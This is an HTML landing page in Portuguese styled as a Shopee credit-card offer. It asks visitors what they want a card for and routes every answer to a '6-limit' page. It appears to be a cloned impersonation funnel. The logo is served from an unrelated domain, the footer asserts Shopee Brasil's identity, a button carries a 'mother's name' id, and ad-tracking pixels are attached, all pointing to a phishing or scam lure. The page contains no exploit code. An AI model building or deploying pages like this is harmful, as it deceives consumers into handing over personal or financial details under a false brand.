﻿<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Cartão Shopee - Seu Interesse</title>
    <link href="../npm/bootstrap%405.3.0/dist/css/bootstrap.min-3.css" rel="stylesheet">







    <script>
        window.pixelId = "675fc2adbe7dec4a0a382d31";
        var a = document.createElement("script");
        a.setAttribute("async", "");
        a.setAttribute("defer", "");
        a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
        document.head.appendChild(a);
      </script>
      
      
      <script
        src="https://cdn.utmify.com.br/scripts/utms/latest.js"
        data-utmify-prevent-subids
        async
        defer
      ></script>
      
      <!-- Meta Pixel Code -->
      <script>
      !function(f,b,e,v,n,t,s)
      {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
      n.callMethod.apply(n,arguments):n.queue.push(arguments)};
      if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
      n.queue=[];t=b.createElement(e);t.async=!0;
      t.src=v;s=b.getElementsByTagName(e)[0];
      s.parentNode.insertBefore(t,s)}(window, document,'script',
      'https://connect.facebook.net/en_US/fbevents.js');
      fbq('init', '9027210824040972');
      fbq('track', 'PageView');
      </script>
      <noscript><img height="1" width="1" style="display:none"
      src="https://www.facebook.com/tr?id=9027210824040972&ev=PageView&noscript=1"
      /></noscript>
      <!-- End Meta Pixel Code -->




    <style>
        @import url('https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700&display=swap');

        body {
            background-color: #f6f6f6;
            color: #1a1a1a;
            font-family: 'Inter', sans-serif;
            line-height: 1.6;
        }

        .header {
            background: #EE4D2D;
            color: #ffffff;
            padding: 1rem 0;
            text-align: center;
            font-size: 1.25rem;
            font-weight: 600;
            grid-area: top-bar;
            box-shadow: 0 2px 4px rgba(0,0,0,0.1);
        }

        .main-content {
            max-width: 480px;
            background-color: #ffffff;
            padding: 2rem;
            border-radius: 12px;
            margin: 0 auto;
            box-shadow: 0 4px 6px rgba(0,0,0,0.05);
            border: 1px solid #f0f0f0;
        }

        .question-title {
            color: #1F2937;
            font-size: 1.25rem;
            font-weight: 600;
            margin-bottom: 1.5rem;
            line-height: 1.4;
        }

        .btn-custom {
            position: relative;
            color: #1F2937;
            border: 1px solid #E5E7EB;
            width: 100%;
            background: white;
            font-weight: 500;
            border-radius: 8px;
            padding: 1rem 1.5rem;
            font-size: 1rem;
            font-family: 'Inter', sans-serif;
            margin-bottom: 0.75rem;
            text-align: left;
            transition: all 0.2s ease;
            display: flex;
            align-items: center;
            justify-content: space-between;
        }

        .btn-custom:after {
            content: '';
            width: 6px;
            height: 6px;
            border-right: 2px solid #9CA3AF;
            border-bottom: 2px solid #9CA3AF;
            transform: rotate(-45deg);
            margin-left: 8px;
            transition: all 0.2s ease;
        }

        .btn-custom:hover {
            border-color: #EE4D2D;
            color: #EE4D2D;
            background: #FFF5F3;
            transform: translateY(-1px);
        }

        .btn-custom:hover:after {
            border-color: #EE4D2D;
        }

        .footer {
            background-color: #1a1a1a;
            color: #f5f5f5;
            text-align: center;
            width: 100%;
            bottom: 0;
            grid-area: footer;
            border-bottom: solid 3px #EE4D2D;
            padding: 2rem 1rem;
            position: relative;
            margin-top: 3rem;
            font-size: 0.875rem;
        }

        @media (max-width: 768px) {
            .main-content {
                margin: 1rem auto;
                padding: 1.5rem;
            }

            .btn-custom {
                padding: 0.875rem 1rem;
            }

            .question-title {
                font-size: 1.125rem;
            }
        }
    </style>
</head>
<body>
<div style="display: grid; grid-template-areas: 'top-bar' 'content' 'footer'; grid-template-rows: auto 1fr auto; min-height: 100vh;">    
    <div class="header">
        <img src="https://pabluzw.com/shopee-cartao/logo.png" alt="Shopee Logo" style="width: 160px;">
    </div>

    <div style="grid-area: content; padding: 0 1rem;">
        <div style="margin-top: 40px;" class="main-content">
            <div id="InteresseCard" class="mb-3">
                <p class="question-title">Qual é o seu interesse com um cartão de crédito hoje?</p>
                <button class="btn btn-custom" onclick="location.href='../card/6-limit/index.php.html'">
                    Fazer uma compra específica
                </button>
                <button class="btn btn-custom" id="maeName" onclick="location.href='../card/6-limit/index.php.html'">
                    Fazer uma viagem
                </button>
                <button class="btn btn-custom" onclick="location.href='../card/6-limit/index.php.html'">
                    Poder gastar mais
                </button>
                <button class="btn btn-custom" onclick="location.href='../card/6-limit/index.php.html'">
                    Organizar a minha vida financeira
                </button>
                <button class="btn btn-custom" onclick="location.href='../card/6-limit/index.php.html'">
                    Outros
                </button>
            </div>
        </div>
    </div>

    <div class="footer" id="footerChg">
        © 2025 Shopee Brasil. CNPJ: 35.635.824/0001-12<br>
        Av. das Nações Unidas, 3003 - Bonfim, Osasco - SP, 06233-903
    </div>
</div>

<script src="https://cdn.utmify.com.br/scripts/utms/latest.js" data-utmify-prevent-subids async defer></script>
<script>
  window.pixelId = "678838a121a1854bae5e0469";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script>
<script src="../npm/bootstrap%405.3.0/dist/js/bootstrap.bundle.min-3.js"></script>
</body>
</html>